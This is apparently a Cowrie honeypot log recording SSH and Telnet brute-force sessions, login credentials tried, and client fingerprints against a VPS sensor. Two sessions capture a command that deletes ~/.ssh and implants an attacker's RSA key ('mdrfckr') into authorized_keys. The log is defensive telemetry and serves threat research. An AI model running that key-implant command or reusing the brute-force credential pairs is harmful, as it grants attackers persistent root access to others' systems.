{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:42:58.406845Z","src_ip":"167.99.49.89","session":"fb618f1b6d19"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:42:58.810157Z","src_ip":"167.99.49.89","session":"fb618f1b6d19"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:42:58.906612Z","src_ip":"167.99.49.89","session":"fb618f1b6d19"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:42:58.907888Z","src_ip":"167.99.49.89","session":"8bd7dcb12307"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44716,"dst_ip":"1.2.3.4","dst_port":23,"session":"02868a499737","protocol":"telnet","message":"New connection: 212.227.125.160:44716 (1.2.3.4:23) [session: 02868a499737]","sensor":"my-vps","timestamp":"2025-08-26T13:42:59.743953Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62882,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6f3bf1b5b01","protocol":"ssh","message":"New connection: 217.72.205.35:62882 (1.2.3.4:22) [session: a6f3bf1b5b01]","sensor":"my-vps","timestamp":"2025-08-26T13:43:03.379556Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:43:03.380922Z","src_ip":"217.72.205.35","session":"a6f3bf1b5b01"}
{"eventid":"cowrie.session.closed","duration":14.015876770019531,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:43:13.759751Z","src_ip":"212.227.125.160","session":"02868a499737"}
{"eventid":"cowrie.session.closed","duration":31.421950578689575,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:43:25.832076Z","src_ip":"212.227.235.229","session":"f13b3ff52917"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58034,"dst_ip":"1.2.3.4","dst_port":22,"session":"f156d5a50fa3","protocol":"ssh","message":"New connection: 212.227.235.229:58034 (1.2.3.4:22) [session: f156d5a50fa3]","sensor":"my-vps","timestamp":"2025-08-26T13:43:28.670843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:43:28.671732Z","src_ip":"212.227.235.229","session":"f156d5a50fa3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:43:28.909539Z","src_ip":"212.227.235.229","session":"f156d5a50fa3"}
{"eventid":"cowrie.login.failed","username":"user1","password":"pass1","message":"login attempt [user1/pass1] failed","sensor":"my-vps","timestamp":"2025-08-26T13:43:29.914789Z","src_ip":"212.227.235.229","session":"f156d5a50fa3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:43:31.155573Z","src_ip":"212.227.235.229","session":"f156d5a50fa3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":4177,"dst_ip":"1.2.3.4","dst_port":23,"session":"70f38711172a","protocol":"telnet","message":"New connection: 212.227.125.160:4177 (1.2.3.4:23) [session: 70f38711172a]","sensor":"my-vps","timestamp":"2025-08-26T13:43:44.503478Z"}
{"eventid":"cowrie.session.connect","src_ip":"14.160.154.91","src_port":37676,"dst_ip":"1.2.3.4","dst_port":23,"session":"445d5eb2c2ca","protocol":"telnet","message":"New connection: 14.160.154.91:37676 (1.2.3.4:23) [session: 445d5eb2c2ca]","sensor":"my-vps","timestamp":"2025-08-26T13:43:53.336257Z"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":43054,"dst_ip":"1.2.3.4","dst_port":22,"session":"08bfbfb8e12c","protocol":"ssh","message":"New connection: 167.99.49.89:43054 (1.2.3.4:22) [session: 08bfbfb8e12c]","sensor":"my-vps","timestamp":"2025-08-26T13:43:57.269132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:43:57.270022Z","src_ip":"167.99.49.89","session":"08bfbfb8e12c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:43:57.360419Z","src_ip":"167.99.49.89","session":"08bfbfb8e12c"}
{"eventid":"cowrie.login.success","username":"root","password":"005500","message":"login attempt [root/005500] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:43:57.764420Z","src_ip":"167.99.49.89","session":"08bfbfb8e12c"}
{"eventid":"cowrie.session.closed","duration":13.387218236923218,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:43:57.890629Z","src_ip":"212.227.125.160","session":"70f38711172a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:43:57.966483Z","src_ip":"167.99.49.89","session":"08bfbfb8e12c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:43:57.967291Z","src_ip":"167.99.49.89","session":"08bfbfb8e12c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:43:57.968359Z","src_ip":"167.99.49.89","session":"08bfbfb8e12c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:43:58.062341Z","src_ip":"167.99.49.89","session":"08bfbfb8e12c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:43:58.372584Z","src_ip":"167.99.49.89","session":"08bfbfb8e12c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:43:58.373416Z","src_ip":"167.99.49.89","session":"08bfbfb8e12c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:43:58.465993Z","src_ip":"167.99.49.89","session":"08bfbfb8e12c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:43:58.467180Z","src_ip":"167.99.49.89","session":"08bfbfb8e12c"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":43058,"dst_ip":"1.2.3.4","dst_port":22,"session":"9be1b302cd28","protocol":"ssh","message":"New connection: 167.99.49.89:43058 (1.2.3.4:22) [session: 9be1b302cd28]","sensor":"my-vps","timestamp":"2025-08-26T13:43:58.554996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:43:58.555892Z","src_ip":"167.99.49.89","session":"9be1b302cd28"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:43:58.645698Z","src_ip":"167.99.49.89","session":"9be1b302cd28"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:43:59.046814Z","src_ip":"167.99.49.89","session":"9be1b302cd28"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:44:00.138971Z","src_ip":"167.99.49.89","session":"9be1b302cd28"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":43070,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae5b7720a7f1","protocol":"ssh","message":"New connection: 167.99.49.89:43070 (1.2.3.4:22) [session: ae5b7720a7f1]","sensor":"my-vps","timestamp":"2025-08-26T13:44:00.226901Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:44:00.227774Z","src_ip":"167.99.49.89","session":"ae5b7720a7f1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:44:00.316914Z","src_ip":"167.99.49.89","session":"ae5b7720a7f1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:44:00.712892Z","src_ip":"167.99.49.89","session":"ae5b7720a7f1"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:44:00.805074Z","src_ip":"167.99.49.89","session":"08bfbfb8e12c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:44:00.806186Z","src_ip":"167.99.49.89","session":"ae5b7720a7f1"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":50260,"dst_ip":"1.2.3.4","dst_port":22,"session":"decfd8a7899f","protocol":"ssh","message":"New connection: 45.88.8.186:50260 (1.2.3.4:22) [session: decfd8a7899f]","sensor":"my-vps","timestamp":"2025-08-26T13:44:28.032247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:44:28.682707Z","src_ip":"45.88.8.186","session":"decfd8a7899f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T13:44:28.683822Z","src_ip":"45.88.8.186","session":"decfd8a7899f"}
{"eventid":"cowrie.login.success","username":"root","password":"900000000","message":"login attempt [root/900000000] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:44:32.762283Z","src_ip":"45.88.8.186","session":"decfd8a7899f"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:44:33.682218Z","src_ip":"45.88.8.186","session":"decfd8a7899f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60408,"dst_ip":"1.2.3.4","dst_port":22,"session":"7663aa370f0a","protocol":"ssh","message":"New connection: 212.227.235.229:60408 (1.2.3.4:22) [session: 7663aa370f0a]","sensor":"my-vps","timestamp":"2025-08-26T13:44:41.602451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:44:41.604873Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:44:41.911168Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:44:43.138339Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:44:43.772997Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:44:43.773767Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:44:43.774803Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:44:44.085142Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:44:44.809823Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:44:44.810536Z","src_ip":"212.227.235.229","session":"7663aa370f0a"}
